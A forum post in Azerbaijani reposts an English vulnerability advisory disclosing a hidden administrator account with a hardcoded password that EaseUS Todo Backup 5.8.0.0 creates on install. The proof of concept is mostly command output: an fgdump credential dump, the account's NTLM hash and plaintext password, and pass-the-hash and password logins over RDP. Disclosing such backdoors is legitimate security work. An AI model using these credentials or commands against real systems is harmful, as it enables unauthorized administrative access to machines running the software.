Bəzən elə olur ki,hər hansı proqram təminatını kompüterinizə/serverimizə yazırıq amma proqramın sistemdə etdiyi dəyişikliklərdən xəbərsiz oluruq.
Bu yaxınlarda bu kimi hal öz başıma gəldi yaxşıki ayıq-sayıqlığı itirmədin.
Mövzuda adı çəkilən proqram təminatı Windows Əməliyyat sistemində backupları sadələşdirmək və avtomatizə etmək üçün nəzərdə tutulmuşdu.
Problem ondan başladıki proqramı install etdikdən sonra sistemdə Lokal Admin akkauntlar içində yeni Admin Akkauntun yarandığını gördüm.
Bu həddən artıq böyük risk daşıyır.Məsələn nəzərə alsaq ki,bu kimi proqram təminatını Korporativ şəbəkədə install edirik və managementdə RDP dən istifadə ediriksə
tamamilə owned olmaq şansımız var.
Uzun sözün qıssası proqramı tətqiq edib BackDoor akkauntun olduğunu ayırd etdim.
+
Həmin Lokal Admin akkauntun parolunun hardcoded olması + ən azı 1>ildən yuxarıda parolunun wild-da gəzməsini nəzərə alsaq deməli bu metodu məndən qabaq kimsə tapıb istifadə edirmiş deməkdir.
http://packetstormsecurity.com/files/125809/EaseUS-Todo-Backup-5.8.0.0-Hardcoded-Password.html
http://packetstorm.interhost.co.il/1403-exploits/easeustodo-credentials.txt
Kod:
Vulnerable Software:
========================================
EaseUS Todo Backup 5.8.0.0 (build 20130321)
http://oi62.tinypic.com/108i4ut.jpg
========================================
Vuln: Hardcoded Administrative Password./Potential backdoor.
========================================
Impact:
An attacker exploiting this vulnerability could assume greater privileges on a compromised system, allowing them to potentially destroy data or take control of computers for malicious purposes.
========================================
About software:
Designed for small and medium-sized businesses.
Simplify backup & recovery management to minimize server downtime and ensure business continuity
========================================
Vuln details:
EaseUS Todo Backup 5.8.0.0 (build 20130321)
(other versions may also suffer from this but not tested)
when installing it on your machine creates hidden Administrative local account on your machine with hardcoded/broken password.
But this can be abused by remote attackers as well.
Using this administrative account remote/local attacker may completely compromise target machine.
Here is few Proof of concept demonstrations:
*Before installation ("net user" command on target machine)*
C:\Users\Administrator>NET USER
User accounts for \\WIN-CE1QUVOKT1H
---------------------------------------------------------------------------
Administrator Guest
The command completed successfully.
*After installation complete: (Notice: we've got new local administrative account in silent manner!)*
C:\Users\Administrator>NET USER
User accounts for \\WIN-CE1QUVOKT1H
---------------------------------------------------------------------------
Administrator ETB User Guest
The command completed successfully.
C:\Users\Administrator>NET USER
User accounts for \\WIN-CE1QUVOKT1H
---------------------------------------------------------------------------
Administrator ETB User Guest
The command completed successfully.
C:\Users\Administrator>control userpasswords2
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>fgdump.exe
fgDump 2.1.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright(C) 2008 fizzgig and foofus.net
fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
more information.
No parameters specified, doing a local dump. Specify -? if you are looking
elp.
--- Session ID: 2014-03-22-05-13-53 ---
Starting dump on 127.0.0.1
** Beginning local dump **
OS (127.0.0.1): Microsoft Windows Unknown Server (Build 9600) (64-bit)
Passwords dumped successfully
Cache dumped successfully
-----Summary-----
Failed servers:
NONE
Successful servers:
127.0.0.1
Total failed: 0
Total successful: 1
C:\Users\Administrator\Desktop>net user
User accounts for \\WIN-CE1QUVOKT1H
---------------------------------------------------------------------------
Administrator ETB User Guest
The command completed successfully.
C:\Users\Administrator\Desktop>net user "ETB User"
User name ETB User
Full Name ETB User
Comment For EaseUS Todo Backup Central Management Cons
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/21/2014 10:12:52 PM
Password expires Never
Password changeable 3/21/2014 10:12:52 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
C:\Users\Administrator\Desktop>
C:\Users\Administrator\Desktop>type 127.0.0.1.pwdump
---------- SNIP ----------------
ETB User:1001:NO PASSWORD*********************:DE0F2B9AAEDF6BF59FED68AB06C334C2:
---------- SNIP ----------------
This hardcoded administive password filtrates in wild:
Pass: ~1EaseUs@AcsT
http://forum.insidepro.com/viewtopic.php?t=8677&start=420&sid=ed953995a5aa360b9c5be3f1472328d6
Trying to logon to this account:
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
win-ce1quvokt1h\etb user
C:\Windows\system32>whoami /all
USER INFORMATION
----------------
User Name SID
======================== =============================================
win-ce1quvokt1h\etb user S-1-5-21-140604893-3061859077-1642753036-1001
GROUP INFORMATION
-----------------
Group Name Type S
ID Attributes
============================================================= ================ =
=========== ==================================================
Everyone Well-known group S
-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S
-1-5-114 Group used for deny only
BUILTIN\Administrators Alias S
-1-5-32-544 Group used for deny only
BUILTIN\Users Alias S
-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S
-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S
-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S
-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S
-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S
-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S
-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S
-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S
-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\Windows\system32>exit
Testing for lovely Pass The Hash technique:
Result is successfull against Server 2012 R2
[blackhat@localhost FreeRDP]$ xfreerdp -u "ETB User" -p DE0F2B9AAEDF6BF59FED68AB06C334C2 192.168.1.103
WARNING: Using deprecated command-line interface!
-p ****** -> /p:******
-u ETB User -> /u:ETB User
192.168.1.103 -> /v:192.168.1.103
connected to 192.168.1.103:3389
Closed from X11
PIC 1:
http://oi58.tinypic.com/2z8b7t4.jpg
Or using valid and hardcoded+known credentials:
[blackhat@localhost ~]$ rdesktop -u "ETB User" -p ~1EaseUs@AcsT 192.168.1.103
Autoselected keyboard map en-us
Connection established using SSL.
WARNING: Remote desktop does not support colour depth 24; falling back to 16
PIC 2:
http://oi60.tinypic.com/2j459pk.jpg
===================== WITH LOVE FROM AZERBAIJAN ========================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
exploit-db.com
insecurety.net
millikuvvetler.net
b3yaz.org
Special respect's to CAMOUFL4G3 && ottoman38 and to all
Azerbaijan Black hatz,Aa team && to All Turkish hackers.
/AkaStep
